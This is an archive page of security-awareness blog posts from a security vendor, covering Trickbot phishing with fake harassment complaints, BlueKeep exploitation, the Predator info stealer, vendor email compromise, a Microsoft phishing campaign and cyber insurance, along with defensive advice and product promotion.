Category Archives: For Business

SECURITY ALERT: Trickbot Launches BEC Attacks with Fake #MeToo Harassment Claims

Security researchers witnessed and reported on a Trickbot resurgence in the past few days. Apparently, now Trickbot launches BEC attacks carefully targeting important people within US-based organizations. Key people within the targeted organizations receive highly worrying emails claiming that someone at work filed a sexual harassment complaint against them.

The emails are allegedly coming from the U.S. Equal Employment Opportunity Commission (EEOC), exactly the authority which deals with such complaints. The messages are looking official enough not to arouse suspicions right away. The hackers behind this new Trickbot campaign are really choosing their victims in a smart way, from the upper tier of businesses and organizations.

Here is how Trickbot aims to wreak havoc now and how to recognize it.

How Trickbot Launches BEC Attacks and How the Emails Looks Like

Over time, Trickbot achieved notoriety with its capacity to adapt and change strategy. Either it was targeting the financial sector (in the beginning), or gaining internet worm abilities, or spoofing trusted brands like Dropbox, or learning to disable Windows Defender. The attackers behind Trickbot were always creative and knowledgeable, which is how Trickbot managed to surpass Emotet and become the biggest malware threat today.

In its newest tactic, Trickbot now sends emails claiming to be on behalf of the U.S. Equal Employment Opportunity Commission, due to an alleged complaint against the target made by a colleague. In order to find out who accused them of sexual misconduct in the workplace, the victim has to open the email attachment.

sample phishing email

The caption of the fake Trickbot BEC email, via 

The name of the attachment is something along the lines of Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc.  Within that attachment, Trickbot is hiding, ready to infect the victim’s machine and potentially breach the network of the entire organization.

There are some other signs that something is amiss in the new Trickbot campaign. If the emails are analyzed carefully, one can notice spelling mistakes and all the things that usually give fake emails away.

Sadly, this newest instance of spear-phishing found a goldmine of social emotion to exploit: fear. Nothing new on this count, since that’s how all kinds of social engineering attacks work, by exploiting common human emotions and drives.

But lately, hackers are really upping their game on this account: last week it was fake court subpoenas, today it is fake sexual harassment complaints.

How to Protect Yourself from This New Wave of Trickbot Attacks and Spear-Phishing in General

No matter how urgent and serious an email seems to be, don’t click links and don’t open attachments if it’s about something out of the ordinary. That sense of urgency and seriousness is exactly what hackers are aiming for.

Don’t click on links and attachments until you check the validity of the email through alternate means. These alternate means can include: getting in touch with the legitimate sender over phone / new email thread / social media accounts, checking with the police or your cybersecurity provider, running the email through an email security tool that protects against BEC attacks and so on.

Final Words

Personally, I am very saddened to see that Trickbot contributes to a #MeToo-like panic with these fake sexual harassment claims scare. I think that there’s this pervasive and really damaging myth, that the current campaign against sexism and harassment in the workplace can somehow make victims out of innocent men. While it’s wise to never say never, this is highly unlikely, and decent people really do not have anything to worry about.

But the way Trickbot launches BEC and phishing attacks now is capitalizing on this damaging myth and is also helping to spread it, unfortunately. My advice to anyone, regardless of the exact nature of a worrisome email you are receiving, is to not believe anything until you investigate.

Stay safe!

The post SECURITY ALERT: Trickbot Launches BEC Attacks with Fake #MeToo Harassment Claims appeared first on Heimdal Security Blog.

SECURITY ALERT: Remain Vigilant for More BlueKeep Attacks That Can Impact Vulnerable Windows Machines

Almost six months ago, we were urging users to patch their systems due to a remote code execution vulnerability present in Remote Desktop Services, where attackers could connect to a target’s system using RDP. At that time (May 2019), Microsoft released a patch for CVE-2019–0708, the Remote Desktop vulnerability dubbed BlueKeep. The exploitation could cause the “blue screen of death”, potentially leading to a Game of Thrones ‘Red Keep’ moment”. This vulnerability was thought to be ‘wormable’, meaning that any malware that exploited it could propagate from computer to computer.

We predicted that it could potentially produce the same amount of damage as we witnessed in the case of the WannaCry ransomware and the older Conficker worm. A few days back, security researcher Kevin Beaumont reported that his BlueKeep honeypot was being exploited in the wild. His discovery was also confirmed by Marcus Hutchins, the security researcher who stopped the WannaCry outbreak and who is a specialist in the BlueKeep exploit.

How was the BlueKeep exploit used?

Recently, a malicious hacker group was spotted using a demo BlueKeep exploit released by the Metasploit team back in September, which was meant to help system administrators test vulnerable systems. Attackers have now been using it break into unpatched Windows systems and install cryptocurrency miners.

But even though these attacks may seem insignificant compared to what had been foreseen, right now, the Microsoft security team is warning its customers that “the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners”.

“Security signals and forensic analysis show that the BlueKeep Metasploit module caused crashes in some cases, but we cannot discount enhancements that will likely result in more effective attacks. In addition, while there have been no other verified attacks involving ransomware or other types of malware as of this writing, the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners.”- Microsoft’s Security Blog

In other words, although many security researchers thought that the attacks were not as bad as everyone believed they would be, Microsoft supports the idea that this is merely the beginning and that danger most likely is still around the corner.

“Many of these unpatched devices could be unmonitored RDP appliances placed by suppliers and other third-parties to occasionally manage customer systems. BlueKeep can be exploited without leaving obvious traces, customers should also thoroughly inspect systems that might already be infected or compromised.”, said Microsoft.

Consequently, for the third time this year, Microsoft is once again urging its users to apply their patches. The second warning came as a reminder at the end of May 2019, when almost 1 million computers connected were still vulnerable to CVE-2019-0708. As of now, around 750,000 endpoints are thought to still be affected by the BlueKeep vulnerability. Many other organizations have issued warnings in the past few months, including the NSA, the US Department of Homeland Security, or the UK’s National Cyber Security Centre, advising companies to patch their outdated systems.

A BlueKeep vulnerability summary

In case you missed it entirely or are only familiar with some parts of the story, in short, here is what you need to know about the BlueKeep vulnerability:

  • BlueKeep (or CVE-2019-0708) is a vulnerability in the Microsoft RDP (Remote Desktop Protocol) service.
  • It only impacts Windows 7, Windows Server 2008 R2, Windows Server 2008. Windows 8 and Windows 10 systems are not affected by this vulnerability.
  • Microsoft released the patches for the vulnerability in May 2019.
  • Although many researchers developed full-fledged BlueKeep exploits over the summer, no one made the code publicly available because it was considered to be too dangerous and could possibly be exploited by malicious actors, according to ZDNet.
  • In July 2019, a US company began selling a BlueKeep exploit to its customers only for penetration testing purposes.
  • In September, Metasploit published the first BlueKeep proof-of-concept exploit available for anyone.
  • Now, in October, malware creators have started using this BlueKeep Metasploit module in actual malicious campaigns.

Patch your vulnerable systems immediately!

The BlueKeep vulnerability only emphasizes the importance of updating and patching in a timely manner, just like our customers who apply Windows updates through our X-Ploit Resilience module do. Our technology has helped 99.5% of our users successfully deploy their patches in time and we are actively pushing the last 0.5% of them to update as soon as possible.

The post SECURITY ALERT: Remain Vigilant for More BlueKeep Attacks That Can Impact Vulnerable Windows Machines appeared first on Heimdal Security Blog.

SECURITY ALERT: New Fake Subpoena Phishing Campaign Spotted, Installing Predator

A new twist to the classic phishing campaign has been observed in a recent string of emails targeting UK residents, and especially retail and insurance companies in the UK. This new twist claims that the targets have been subpoenaed and summoned to court within the next 14 days, providing a malicious link for details.

Once the curious victim clicks on the link in the fake subpoena phishing campaign, they become infected with Predator the Thief.

Predator the Thief is a particularly nasty info stealer malware, developed by Russian hackers and first discovered in February 2019. Since its initial spotting, Predator the Thief has changed delivery methods a few times, becoming very effective in reaching its targets.

This new fake subpoena phishing campaign targeting the UK is the latest trick up the Predator’s sleeve. After all, most of us can’t remain indifferent to an official-looking invitation to court. What if we’re sued or called to testify? Sadly, we’re compelled to check what it’s all about.

How Does the Fake Subpoena Phishing Campaign Work?

Like most phishing campaigns, this new one also impersonates a trusted brand, partner or institution in order to appear legit. With the victim’s trust earned, the scammers attach a malicious file or link that redirects them to another legitimate-looking portal, where they are asked to log in. The credentials go directly to the hackers, who then use them to steal precious data and assets.

Phishing, in general, is a social engineering mechanism, which relies on how convincing it can be and on manipulating emotions (trust, fear, joy) in the victim. In the case of the new fake subpoena phishing campaign, the emotion the hackers are trying to arouse is obviously alert, or fear.

This is how the fake subpoena phishing campaign unfolds.

It starts with a spoofed email modified to look as if it’s coming from the UK Ministry of Justice. The message itself contains little info besides the notice that the victim has been subpoenaed and they need to comply within 14 days. This obviously creates a sense of urgency and panic, which can lead people to click the link without thinking too much.

sample phishing email fake subpoena

The attackers in the new fake subpoena phishing campaign are also urging the victim to prepare all the documents requested of them in the link. One more incentive to click the malicious link.

Once the victims clicked it, the Predator the Thief malware payload was delivered via a multi-step redirection chain, all pages looking legit. The Cofense researchers who initially discovered the campaign said that the first Word document downloaded by the user is used to execute a first-stage downloader for Predator, silently.

How Does the Infection with Predator the Thief Act on the Infected Device?

After a device becomes infected with Predator the Thief from the fake subpoena phishing campaign, the info stealer starts harnessing.

The Predator the Thief is an exceptionally dangerous stealer, conceived from the start with built-in self-obfuscating mechanisms that conceal part of its code at all times.

What kind of information does Predator steal? This is what researchers have noticed in the current campaign:

  • Credentials and other sensitive data;
  • Harvesting info from various local and cloud folders;
  • All files related to cryptocurrency (all .dat and .wallet Ethereum, Multibit, Electrum, Armory, Bytecoin, and Bitcoin files);
  • Cookies from a large list of web browsers (Chrome, Firefox, Filezilla, WinFTP, Steam, and Discord among others – so gamers are also targeted by it);
  • Regular screen captures (screenshots).

Once the information has been gathered, it’s packed and sent to the C2 (command and control) server of the malware creators. The data package is sent via HTTP POST requests, alongside fingerprint data and sensitive network configurations.

After the data is sent, the Predator malware cleans up most of the infection’s traces and self-destructs. This makes it particularly difficult to detect and makes post-factum forensics less effective than they are when researching regular malware infections.

Furthermore, the creators of the Predator info stealer market it heavily in a MaaB (Malware as a Business) regime, on Telegram groups. They allow access to their malware for a low price, to anyone interested, along with an easy mode of use and even support when necessary. That means that virtually everyone can buy and use the Predator info stealer regardless of their technical skills.

Still, the people who are deploying it now, in the fake subpoena phishing campaign definitely know what they are doing. The pages look legit through and through and the message is well crafted to induce panic and compliance.

How to Stay Safe from this Phishing Campaign

I’ll end this post on the same note as all our anti-phishing advice. There are three things you can and must do to keep your business and personal data safe from Predator the Thief info stealers and others like it.

#1. Learn more about phishing.

We have several guides on how to recognize phishing and spear-phishing attempts, and there are plenty of other valuable resources online. Take time to read a bit every week and you’ll get better at detecting something amiss. Stay on guard.

#2. Have an active DNS traffic filter to block phishing links.

In today’s threatscape, you can’t be safe with Antivirus alone. You also need a reliable DNS traffic filter, especially if you have a business network to protect. A cutting-edge solution like our Thor Foresight Enterprise can block criminal infrastructures before they have time to deliver their payload via infected links.

#3. Stay skeptical and always double-check.

This new fake subpoena phishing campaign wouldn’t be successful if people would take time to investigate before clicking, instead of panicking. Know that phishing gets more and more frequent and creative, so maintain a critical view of everything you receive online.

If you have any doubts about a domain or email or link, you can always send it to us at and we’ll get back to you with a verdict right away. Stay safe!

The post SECURITY ALERT: New Fake Subpoena Phishing Campaign Spotted, Installing Predator appeared first on Heimdal Security Blog.

Cyber Insurance: Should You Consider It For Your Company?

In the wake of frequent cyber-attacks affecting businesses, cyber insurance has become a highly researched and debated topic. This industry has been constantly growing for a couple of decades now. As per Zion Market Data research, the global cyber insurance market is expected to reach $22.8 billion globally by 2024, with a compound annual growth rate of 24%.

In spite of the high availability of cybersecurity protection and prevention tools, there still might be a chance for a company to become a data breach victim. However, this doesn’t mean measures such as employee training and cybersecurity solutions should be left behind. By all means, you should not be relying solely on reactive practices, like buying insurance policies. It’s always better to prevent a cyber disaster than deal with the consequences.

But what does cyber insurance cover? Is it worth investing in cyber insurance? These questions may have crossed your mind, so, in this article, I’m going to try to give answers to some burning questions and help you decide if or which cyber insurance providers may be right for your organization.

What is Cyber Insurance?

First things first, let’s start off with a definition of cyber insurance.

Cyber insurance is a type of insurance for businesses against digital threats. It is also commonly known as cyber risk or cyber liability insurance.

With so many cyber dangers threatening companies, no wonder it has become a highly popular service for organizations large and small around the world. But if you do decide to invest in cyber insurance, are you fully aware of what it’s all about?

Keep on reading to find out.

Why do companies generally purchase cyber insurance policies?

And how many organizations out there are actually covered by cyber insurance? According to Spiceworks data, 38% of organizations are covered by a cyber-insurance plan, with nearly half having had a policy for under 2 years, 32% for 3-4 years, and 24% having been covered for 5+ years.

cyber insurance statistics

Source: Spiceworks study

What’s more, 71% of survey respondents stated that they purchased a policy for precautionary reasons. This seems to be the top driver for organizations to get coverage, followed by an increased priority on cybersecurity (44%), handling a high volume of personal data (39%), and industry-specific regulations (28%). On top of that, only 14% seem to have bought insurance coverage due to customer requirements and an additional 14% as a result of new data protection regulations, such as GDPR. Additionally, IT professionals admit to choosing cyber insurance coverage just to get some peace of mind and hope they never use it.

cyber insurance statistics

Source: Spiceworks study

What does cyber insurance cover?

Cyber risk is without a doubt one of the most difficult aspects to deal with as it has a high impact on both societies and businesses worldwide. Cyber insurance plans are typically created with digital risk in mind in order to ensure (in the best way they can) the continuity of a business and ultimately enable companies to become cyber resilient.

However, not all cyber insurance policies are created equal. Sometimes, decision-makers may be tempted to choose low-price services and end up with a bad deal. This typically happens because in some cases, cyber insurance providers trying to safeguard their existence in the face of harsh competition, tend to create packages that leave high-risk areas uncovered. Why does this happen, you may be wondering. Because some cyber insurance vendors are inexperienced in cybersecurity and don’t fully understand an organization’s actual needs in the current threatscape.

Before deciding to purchase a cyber-insurance policy, you will want to know what it covers to be able to better asses if a certain insurer is a good fit for your company. So, evaluate your options carefully.

A Cyber insurance coverage checklist

Here are the main items typically covered by cyber insurance policies:

  • Restoration of damaged data and software destructed by forms of malware (such as viruses, spyware, worms, etc.)
  • Extortion losses (ransomware)
  • Setting up a temporary environment so your company can continue to operate
  • Business interruptions that resulted directly from a cyber-attack (such as DDoS attacks)
  • Temporary security experts hired to defend your company against the attack
  • Legal expenses and fees
  • Costs with notifying employees and the public
  • Costs associated with the reputation damage

What does cyber insurance NOT cover?

Even though your cyber insurance may fix some of your post-cyberattack problems, keep in mind that it will not sort everything out. Below are some aspects that are (usually) not covered:

  • Physical property loss and damage

Normally, cyber insurance coverage excludes physical loss that happened as a direct result of a cyber-attack. For instance, think about manufacturers and energy suppliers that may be more likely to become victims of cyberattacks meant to cause physical damage. If machines are destroyed due to malicious hackers overriding them, losses will not be covered by cyber insurance and instead, they would most likely fall under other types of business insurance, such as crime insurance.

  • Social engineering attacks

Oftentimes, cyber insurance policies have social engineering reduction clauses. Some sources are mentioning a payout reduction if employees fall victim to social engineering attacks. For instance, according to a city government, “they had a $50-million-dollar cybersecurity insurance policy, but if a claim involved social engineering, then it only paid out a maximum of $200,000.” And unfortunately, customers who are not aware that 70% to 90% of all successful data breaches happen due to social engineering attacks, are potentially wasting up 90% of they were expecting to be covered.

What’s more, according to a report released by Mactavish, many insurance policies contain grey areas. Below you can see what they normally don’t cover.

  • They do cover attacks or hacks but exclude accidents and errors
  • They do cover costs imposed by law, but not total incident costs
  • They only cover the time of the network interruption, but not the overall business disruption moving forward
  • They may exclude systems delivered by third-party service providers
  • They may not cover software or systems currently in development
  • Policies may sometimes not cover incidents caused by contractors
  • Customers may not be able to choose their own IT, PR or legal specialist since the insurance policy only covers appointed advisors.

Thus, the points above would typically need to be negotiated before signing the insurance contract. Therefore, you really need to bear in mind these common exceptions when you are evaluating cyber insurance vendors and be sure you choose the plan that best matches your business and cybersecurity needs. And better yet, never put large amounts of money and your trust in cyber insurance policies and invest in proactive cybersecurity measures instead.

Is cyber insurance really worth it after all?

It depends on several factors. Ultimately, it’s up for you to decide, according to your current business needs.

For instance, would it be better to spend $15,000 to buy a cyber insurance policy or to use that money to upgrade your current cybersecurity offering and train your employees to recognize and react at the first signs of cyber compromise? Or split the amount between these areas?

Oftentimes, cyber insurance may create a false sense of security, so be careful how much you actually invest in it and what items it includes. Also, keep in mind that after choosing a certain insurance policy, you should not just leave it there to gather dust indefinitely. In fact, your cyber insurance contract should be constantly reviewed and updated depending on your evolving needs and current cyber-threat dangers.

So, how much cyber insurance coverage do you really need?

On average, data breaches cost companies 150$ per record, according to the IBM and Ponemon Institute 2019 Cost of a Data Breach Report. Furthermore, the study also concluded that the average time to identify and contain a data breach was 279 days. If you do decide to purchase a cyber insurance policy, these figures can be some good starting points.

You should take into consideration aspects such as:

  • How much sensitive information you store
  • Where is the sensitive information stored
  • What measures you would need to take if you experienced a data breach
  • What would the costs be to replace the damaged software (and perhaps hardware)
  • Do you have any employees trained to mitigate the damage, or do you need external security specialists?
  • Is there any PR staff able to deal with crisis management if you experienced a data breach?

Trying to find answers to these questions and come up with answers to other questions formulated by yourself taking into account your own business model will help you get an idea of how much insurance coverage you would need in case of an emergency.

Should you replace cybersecurity with cyber insurance?

No, never! Cyber insurance should never be used, under any circumstances, as a cybersecurity replacement. Do not operate with the it-won’t-happen-to-me mentality and try to cut down costs associated with security tools. You may “save” some money for a while, but in the long run, this practice will only damage your business.

Cyber insurance and ransomware payouts, a controversy

Some cyber-insurance companies seem to encourage ransomware victims to pay the ransom. Apparently, this practice is seen as the cheapest way to reverse ransomware attacks and at the same time ensure the least downtime possible. And this happens despite warnings and discouragement from law enforcement agencies that are saying “ransoms shouldn’t be paid because they fund criminal activity.” What’s more, in the past, we saw ransomware strains that deleted data even if the victims paid, so the ransomware payment behavior certainly comes as a red flag. Sadly, the main goal of insurance companies here is to get the issues resolved at the lowest price possible.

What should companies do instead of paying the ransom? Use the proper cybersecurity tools, apply system and software updates as soon as they are released, and always back up their sensitive data.

Bottom Line

Even though no organization will be completely safe from cyber-attacks and even if cyber insurance does offer you protection to some extent, it’s never advisable to rely solely on it. So, make sure that you invest in the right proactive cybersecurity tools, systems, and procedures alongside your employees’ cybersecurity training. And only then, if you choose to, create a cyber insurance plan tailored to your company and be certain it gets constantly revised and updated.

The post Cyber Insurance: Should You Consider It For Your Company? appeared first on Heimdal Security Blog.

Vendor Email Compromise (VEC): The Classic Business Email Compromise (BEC) Scheme with a Spin

A new email fraud scheme has taken Business Email Compromise (BEC) to a whole new level of sophistication. The recently discovered type of email scam has been dubbed Vendor Email Compromise (VEC) and as its name suggests, the attackers prey on employees working at vendor companies 

A new cybercriminal group, identified as Silent Starling by researchers at Agari, ran these malicious email campaigns. The fraudsters hacked the email accounts of employees working in the target’s finance department and gathered as much information as they could from their inboxes. In the end, the scammers sent them perfectly timed payment requests accompanied by fake invoices.  

Since late 2018, over 700 employee accounts from more than 500 companies in the United States and over a dozen other countries have been compromised. Consequently, more than 20,000 sensitive emails have been harvested. 

Vendor Email Compromise, a new milestone in the evolution of BEC attacks 

Traditionally, a BEC attack is based upon what is commonly referred to as CEO fraud or the impersonation of an upper or middle-management employee. In this case, fraudsters contact their “colleagues” from the financial department, requesting an urgent payment and providing all the necessary details for the money to be transferred. Since the email comes from a superior and the message is transmitted with a sense of urgency, employees are likely to fall for this scam, being completely unaware the money will end up in a cybercriminal’s account.  

And now, through this social engineering tactic, impostors are targeting a new niche: vendors 

More precisely, scammers are preying on employees working in a vendor’s finance department, with the ultimate goal of gathering intelligence on customers they interact with. 

Who are the attackers behind Silent Starling? 

The criminal group originates from West Africa and has been involved in fraudulent practices since 2015. First, they engaged in romance scams and check fraud and transitioned to BEC attacks in mid-2016, Agari writes. In their first two years of BEC, they focused on wire transfer requests and gift card attacks, only at the end of 2018 shifting their focus to VEC scams.  

Three main malicious actors belonging to the cyber-gang have been identified, but at least eight other group members may have been involvedEach of these individuals was in charge of certain tasks, such as collecting leads to be targeted, finding mule accounts or hijacking and scanning compromised email accounts in search of relevant information.  

How do Vendor Email Compromise attacks work? 

Similarly, as I’ve briefly mentioned aboveboth BEC and VEC scams are based on social engineering. But what sets them apart is that VEC attacks are targeting a supplier’s customers, who receive what looks like realistic payment requests for an actual service they are expecting to pay for.  

But how do VEC scams actually work? 

Since they are highly elaborate schemes, they are conducted through multiple stages. Below you can see the main phases of Vendor Email Compromise attacks: 

Attack PhasesDescription
Phase 1The first phishing wave / Target: Vendors
Phase 2Account takeover
Phase 3Inbox monitoring
Phase 4The second phishing wave / Target: The vendors’ customers

Phase #1. Credential stealing through phishing campaigns 

The phishing emails coming from the Silent Starling group are posing as popular business applications, a practice commonly employed by cybercriminals. For instance, merely a few days ago, we’ve discovered yet another Microsoft phishing campaign targeting Office365 users 

Going back to Silent Starling’s malicious emails, the website they were using are Microsoft OneDrive or DocuSign login pages and voicemail and fax notifications. 

Vendor Email Compromise VEC


Vendor Email Compromise VEC


The attackers have reportedly used over 70 phishing websites to harvest the users’ credentials. They managed to intercept the login details for more than 700 employees at over 500 companies in 14 countries. The main countries where the attacks were conducted were the United States, Canada, and the United Kingdom.  

But who falls for these email scams in the first place, you may be wondering? Well, the ones who have not received a basic cybersecurity training may click malicious links and enter their login credentials without checking if the sender and landing page are legitimate. What’s more, they are not using the proper tools to protect their business from phishing attacks. 

Apparently, at a single US-based company, the accounts of 39 employees have been compromised. The phishing campaign ran between September 2018 and March 2019, as reported by Agari. The credentials of people in various business functions, such as billing, sales, HR, and senior executives were stolen in these campaigns 

In one of the phishing emails that targeted the above-mentioned company, 13 email accounts were compromised within thirty minutes from the time they were sent. Furthermore, at least six employees also had their personal email account credentials compromised. Most likely, this happened due to employees making the common password mistake of reusing the exact same passwords (or slight variations) for both their corporate and personal accounts and this way, attackers we able to practice credential stuffing 

Phase #2. Taking over the compromised accounts 

During this stage, first of all, the attackers would access the employees’ hacked accounts and look for significant vendors who could be impersonated. 

Secondly, they would set up email rules to forward and even redirect copies of all incoming emails from the respective vendors to the scammers’ inboxes. After these rules are created, victims are most likely not noticing any signs of someone spying on their email accounts. Thus, cybercriminals can continue their activity for a long time and evade detection. 

For instance, the Silent Starling attackers had access for over four months to employees’ email accounts from a US-based real estate company. During this period, they received more than 2,800 confidential emails containing “income statements, invoices, customer agreements, rental injury process, and other policy paperwork”, Agari notes. 

Phase #3. The waiting game begins 

VEC attacks are based on lengthy processes, during which cybercriminals harvest as much sensitive information as they need to in order to be able to masquerade as real vendor representatives. This is one of the main differences between VEC and BEC since the latter usually takes advantage of an individual’s innate tendency to respond to urgency.  

During this phase, fraudsters are trying to figure out information such as: 

  • Vendor’s customers 
  • Invoice look and feel 
  • Customer payments due dates 
  • Due amounts 
  • Customer contacts responsible for payments 

high volume of emails floods their inbox, so these scammers are most probably using automatic tools to identify keywords related to payments and invoices rather than manually looking at each email. 

 Phase #4. Spear phishing emails are sent to the vendor’s customers 

After cybercriminals have gathered enough information from the compromised accounts, they will start the next phase of the VEC attack: crafting authentic-looking spear phishing emails and sending them to the vendor’s customers. Just like in a standard BEC attack, the goal is to trick the victim into transferring money to the fraudster’s account. 

According to Agari, there are three primary aspects that need to be correctly identified by VEC attackers in order for the scams to be successfully conducted: 

  • Vendor identity – Here, employees responsible for customer billing coming from the vendor’s side need to be correctly identified. Then, they can be impersonated in three ways: 
    1. The fraudster logs into the compromised account directly. 
    2. The victim’s email address is spoofed. 
    3. The attacker registers a domain that looks very similar to the vendor’s official domain. 
  • Emails’ content – VEC scammers always do their best to mimic the way a vendor representative writes an email to appear more genuine and may even copy their email signature. 
  • Timing – Attackers need to send payment requests at the exact date that other past invoices were due at, in order not to arouse suspicion. 

 Vendor Email Compromise VEC 


 Vendor Email Compromise VEC


A comparison between VEC and BEC 

How is Vendor Email Compromise different from Business Email Compromise and how are they similar? 

Below you can find a quick comparison between VEC and BEC:

Business Email Compromise (BEC)Vendor Email Compromise (VEC)
In both cases, attackers need access to a business email account or use spoofed email addresses to trick their targets into transferring money to their bank accounts.
A traditional BEC attack takes place inside the targeted organization.

Example: The fraudster impersonating the CEO asks someone from the organization to make a payment.
Attackers break into the vendor’s email accounts and target their customers. Ironically, the initial target (the vendor) will not be affected financially at all.

Example: The fraudster impersonating an employee who works in the vendor’s financial department sends a fake invoice to the customer.
Usually, attackers collect information about their targets from social media and other places publicly available online.Based on multiple stages, during which the attacker gathers relevant information about the target so they can perfectly imitate them (i.e. the way the targeted employees formulate emails, email endings, email signature, etc.)
Scammers use a sense of urgency in their communication with the targeted customer.VEC attacks require extreme patience. Attackers do an extensive amount of research to find out as much valuable information as they can about their targets.

How to protect your business from VEC/BEC attacks 

Naturally, it will be quite difficult for anyone to identify VEC attacks, regardless if you’re a vendor or customer employee. These attacks could go on for months and months without being detected. And since traditional cybersecurity solutions are not able to pick up these types of advanced threats, a mix between human vigilance and the right security tools is what it takes to prevent and stop them before they damage your organization. 

So, how can Business/Vendor Email Compromise be avoided?  

1. Train your employees 

Firstyour staff should be able to identify the tell-tale signs of phishing (suspicious sender email address/URL, the sender is asking them to “update” their credentials or “verify” their identity, etc.). 

This basic knowledge can be accumulated through regular cybersecurity training, so make sure all your employees are on the same page when it comes to identifying phishing and other types of cyberattacks. 

Secondly, your organization should use a next-gen proactive antimalware solution, that blocks malicious links if your employees accidentally click them. 

2. Implement multi-factor authentication methods 

Let’s suppose your employees could not tell they were a victim of a phishing attack and that you were not using the right cybersecurity solution that could have prevented the attack 

After obtaining your employees’ credentials, attackers will now try to log in to their email accounts. So, a good method to prevent unauthorized access is multi-factor authentication. I’ve extensively written about password security best practices here, so feel free to check out this guide as well. 

3. Constantly review your cybersecurity policy 

Accompanied by your mandatory training should be your cybersecurity policy, so make sure you have one in place and update it whenever necessary. Don’t just keep an antiquated one that becomes obsolete as cyber threats develop.  

Your company’s cybersecurity policy should cover best practices that everyone must follow, as well as actionable steps your employees must take at the first signs of compromise 

What’s more, don’t forget about your remote employees. Your cybersecurity policy should have a section specially dedicated to remote workers, who may sometimes be at higher risk than your on-site staff. I encourage you to also take a look at the guide in which I explain what are the cybersecurity issues with remote work and how to address them.  

4. Use a next-generation email fraud protection solution 

There are certain advanced threats that can’t be detected and blocked by traditional spam filters. A standard email security solution will not be able to identify business email compromise: fake money-transfer requests, CEO impersonation/impostor emails, malicious content in historical emails, spoofed emails, etc.  

This is why we’ve developed MailSentry™an email security solution specifically designed to quickly detect fraud, fake invoices and that will help you save time and skip manual background checks.  

MailSentry™ works as an add-on to existing spam filter solutions.

It scans email content and attachments for fraudulent account numbers, invoice modifications, and signs of imposters. It’s based on Artificial Intelligence that detects the signs of the most advanced cyber threats. Furthermore, it uses more than 125 vectors of analysis and is fully coupled with live threat intelligence to find and stop Business Email compromise, CEO Fraud, phishing, and complex malware. Not only that, but it’s also backed up by a live 24/7 anti-fraud specialist team.

MailSentry™ is the only next-gen email security solution in the world connected to bank systems, being capable to cross-check IBAN and Account numbers against money mule accounts.


Business Email Compromise is one of the fastest-growing threats of today’s threatscape. As cybercriminals continue to improve their attack techniques to better evade detection, it will become increasingly harder for you to keep your confidential data and money safe. 

If you are a vendor, train your employees to be extra cautious when establishing any kind of contact with both your customers and internal stakeholders. If you are a company engaged in business relationships with vendors, the same rules apply. Without doubt, you can never be too careful, as you never know where malicious actors and advanced cyber threats may be hiding. Yet, the good news is that your business can and will remain protected and competitive if you take into account all the necessary preventive measures. 

The post Vendor Email Compromise (VEC): The Classic Business Email Compromise (BEC) Scheme with a Spin appeared first on Heimdal Security Blog.

New Microsoft Phishing Campaign Targets Office365 Users

We found evidence of a new Microsoft Phishing Campaign which is targeting Office365 users in particular, but general computer users with a Microsoft account as well. The most troubling aspect of this new campaign is its next degree of complexity.

Even if the tech behind the phishing is not exactly advanced itself, the fact that the attackers are using multiple attack vectors is enough to give pause. From the data we have gathered, we are sad to realize that this new Microsoft phishing campaign is a very solid attack. Everyone who uses a Microsoft account, especially in a business context, should be on their guard.

How this New Microsoft Phishing Campaign Works

Like all phishing campaigns, the aim of these scammers is to get you to enter your credentials in one of their own pages. These phishing pages are masquerading as official Microsoft and OneDrive pages.

The incentive for users to enter their credentials is retrieving an important work-related document. The form may vary, but it’s something that either references an older conversation (‘Here is the intelligence report we discussed…’) or money (‘Here is your invoice…’). For most people, the drive to open such attachments is quite strong.

Links to The Phishing Domains (Sometimes) Come from Compromised LinkedIn Accounts

This is what makes this newest Microsoft phishing campaign so dangerous: it relies on compromised accounts to spread the message. It’s not just shots fired into the dark.

The first step seems to be hacking into someone’s account and then using it to further spread the malicious message. This lends more credibility to the phishing invitation when it arrives in the inbox of the next targets.

Just like in Business Email Compromise (BEC) attacks, the victim believes they are communicating with an acquaintance or a colleague, someone they trust. Someone in our company received this message on LinkedIn, from another person they knew in real life and trusted:

linkedin phishing

The Next Steps in the Microsoft Phishing Campaign

Once the user clicks on the malicious attachment in the Microsoft phishing campaign, they will be redirected to a seemingly legit OneDrive portal.

screenshot of malicious onedrive attachement

After clicking the attachment, the user will then be redirected to a fake Microsoft Office365 portal where they will be asked for their credentials.

microsoft onedrive phishing attempt

If you look at the web address of the page, it’s clearly not what it should be.

Who’s Behind the Wave of Attacks

We identified two domains behind this Microsoft phishing campaign so far, but more will probably spring up in the following weeks.

The first domain, has all the information blocked or modified to show that it is blocked by GDPR. This is a move done to hide all info about what entity registered it, where they are based and so on. Until the block can come off due to malicious activity, the hackers have enough time to do their worst. The IP address of this domain is but the rest of the info is hidden.

VirusTotal has not identified it as malicious yet. According to its registry data, the domain was first created 15 years ago and modified 5 months ago. This indicates that the phishing campaign has been around for a while.

The second domain, has all the info still detectable. The IP addresses they use are and The domain is handled from a US Texas address by an admin with the email dc75a9c3ee070d94s@YAHOO.COM.

VirusTotal does mark this one as suspicious but the domain is still not blocked by most cybersecurity solutions yet. Just like the first domain, and hardly a coincidence, this one has also been updated 5 months ago.

Note of caution: The fact that the attackers are combining several tactics in a concentrated attack is disconcerting. Considering that they first compromised the accounts of real people and then used them as a launcher for the next wave of attacks, we advise full caution.

If you get any kind of message which requires a sign in for downloading something, make sure you check and double-check the domain name and the authenticity of the request. Even if the message doesn’t look like these examples above.

How to Stay Safe from this Microsoft Phishing Campaign and Similar Threats

#1. Learn more about phishing and spear phishing

Keep yourself up to date with the tactics of scammers, so you know how to recognize it when it happens to you.

Spear phishing should be something to be especially mindful of. Spear phishing is the very targeted phishing scam driven at the head of an enterprise or anyone in an executive position. Such a campaign is carefully planned out and tailored to maximize the chances of the person to fall for it.

Read our complete guide on spear-phishing to learn how it works and how to stay safe.

While you’re at it, you might also be interested in this guide on social engineering. Phishing is just one of the ways hackers can get to you by abusing human nature and our desire to trust. Learn the rest of the tricks to be mindful of by brushing up on your social engineering knowledge.

#2. Have a strong DNS traffic filtering solution

Of course, vigilance is not enough. You also need to have a strong DNS filtering solution that can help identify fake websites’ domain name servers.

As long as you have that protecting your endpoints and you continue to be wary of sharing your credentials easily, nothing will disrupt you. Stay safe!

The post New Microsoft Phishing Campaign Targets Office365 Users appeared first on Heimdal Security Blog.

